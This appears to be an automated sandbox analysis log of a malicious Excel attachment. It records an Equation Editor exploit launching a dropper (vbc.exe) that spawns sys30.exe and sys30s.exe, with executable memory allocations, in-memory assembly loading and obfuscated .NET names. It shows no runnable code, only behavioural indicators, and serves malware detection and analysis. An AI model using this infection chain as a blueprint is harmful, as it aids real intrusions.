Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_0062785E9_2_0062785E
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_010243009_2_01024300
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_01023A109_2_01023A10
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_0102035E9_2_0102035E
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_010202A09_2_010202A0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_010236C09_2_010236C0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_0122BB499_2_0122BB49
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 7_2_00C26618 CreateProcessAsUserW,7_2_00C26618
Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeMemory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeMemory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMemory allocated: 76E90000 page execute and read and write
Source: Enclosed.xlsxReversingLabs: Detection: 29%
Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknownProcess created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe 'C:\Users\user\AppData\Local\sys4h57g\sys30.exe'
Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe 'C:\Users\user\AppData\Local\sys4h57g\sys30.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe C:\Users\user\AppData\Local\sys4h57g\sys30.exe
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe 'C:\Users\user\AppData\Local\sys4h57g\sys30.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe C:\Users\user\AppData\Local\sys4h57g\sys30.exeJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Enclosed.xlsxJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVREC60.tmpJump to behavior
Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@51/57@23/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{6618c428-0583-4059-a498-a8ec319ccd46}
Source: vbc.exe, 00000006.00000002.522085206.0000000006EB0000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Data Obfuscation:

barindex
.NET source code contains potential unpackerShow sources
Source: vbc[1].exe.4.dr, Qm29/Lz41.cs.Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: vbc.exe.4.dr, Qm29/Lz41.cs.Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: sys30.exe.6.dr, Qm29/Lz41.cs.Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 6.0.vbc.exe.d80000.0.unpack, Qm29/Lz41.cs.Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 6.2.vbc.exe.d80000.1.unpack, Qm29/Lz41.cs.Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.0.sys30.exe.1220000.0.unpack, Qm29/Lz41.cs.Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.2.sys30.exe.1220000.3.unpack, Qm29/Lz41.cs.Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 8.2.sys30.exe.1220000.1.unpack, Qm29/Lz41.cs.Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: C:\Users\Public\vbc.exeCode function: 6_2_00D8B27A push 00000000h; iretd 6_2_00D8B2C4
Source: C:\Users\Public\vbc.exeCode function: 6_2_00D8CE66 push 00000000h; iretd 6_2_00D8CEB0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 7_2_0122CE66 push 00000000h; iretd 7_2_0122CEB0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 7_2_0122B27A push 00000000h; iretd 7_2_0122B2C4
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_0122CE66 push 00000000h; iretd 9_2_0122CEB0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_0122B27A push 00000000h; iretd 9_2_0122B2C4
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_0062B3E7 push edx; ret 9_2_0062B40A
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_0062B4D3 push ebx; ret 9_2_0062B4D6
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_0062B4D7 push ebx; ret 9_2_0062B4DA
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_0062B480 push edx; ret 9_2_0062B482
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_01020295 pushfd ; ret 9_2_01020296
Source: sys30s.exe.7.drStatic PE information: 0xC7142059 [Sun Nov 3 05:36:25 2075 UTC]
Source: vbc[1].exe.4.dr, Ed06/Qd84.csHigh entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'
Source: vbc.exe.4.dr, Ed06/Qd84.csHigh entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'
Source: sys30.exe.6.dr, Ed06/Qd84.csHigh entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'
Source: 6.0.vbc.exe.d80000.0.unpack, Ed06/Qd84.csHigh entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'
Source: 6.2.vbc.exe.d80000.1.unpack, Ed06/Qd84.csHigh entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'
Source: sys30s.exe.7.dr, Astronotplart/My/tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
Source: sys30s.exe.7.dr, Astronotplart/My/nVdeDLHvVsfVxwgFzORDky8W3f9u4lGmiaWnSDb.csHigh entropy of concatenated method names: '.cctor', 'ipfF6OV8JHE8Qin24Sz2H', 'GBAU51HdoykwtyLJ8j', 'A6Cmw4VPbNKHMkR6BnXqjGTCsaLYYK', 'ZhXAveIVREq8oAgNFODqxTnhx35', 'TL13XiWxESQiImm09SkPUl2iIyfqvqfNa1eW0WN', 'hXlgWtIDkKwHkCLRcj1P0yvWMryPDm997zSDv', 'crnIowWf8YVTDoRdGn'
Source: sys30s.exe.7.dr, Astronotplart/gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: '.ctor', 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
Source: sys30s.exe.7.dr, Astronotplart/My/Resources/cZsjfbJLI2Nt8If5QOa3YzSXxDXbcmzUTY.csHigh entropy of concatenated method names: '7tuLHfXnvgcErulp', 'vFPZGqKub8S44KK9njyrAe1CN2qDJ3IQa7tiGW3Oebu', 'p0Rr9tY6YlifmwQtRmfPXGEDX', 'IPf8zIYNrroPiylxpRDezmMidW58Fr8mLO'
Source: sys30s.exe.7.dr, Astronotplart/rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: '.ctor', 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
Source: 7.0.sys30.exe.1220000.0.unpack, Ed06/Qd84.csHigh entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'
Source: 7.2.sys30.exe.1220000.3.unpack, Ed06/Qd84.csHigh entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'
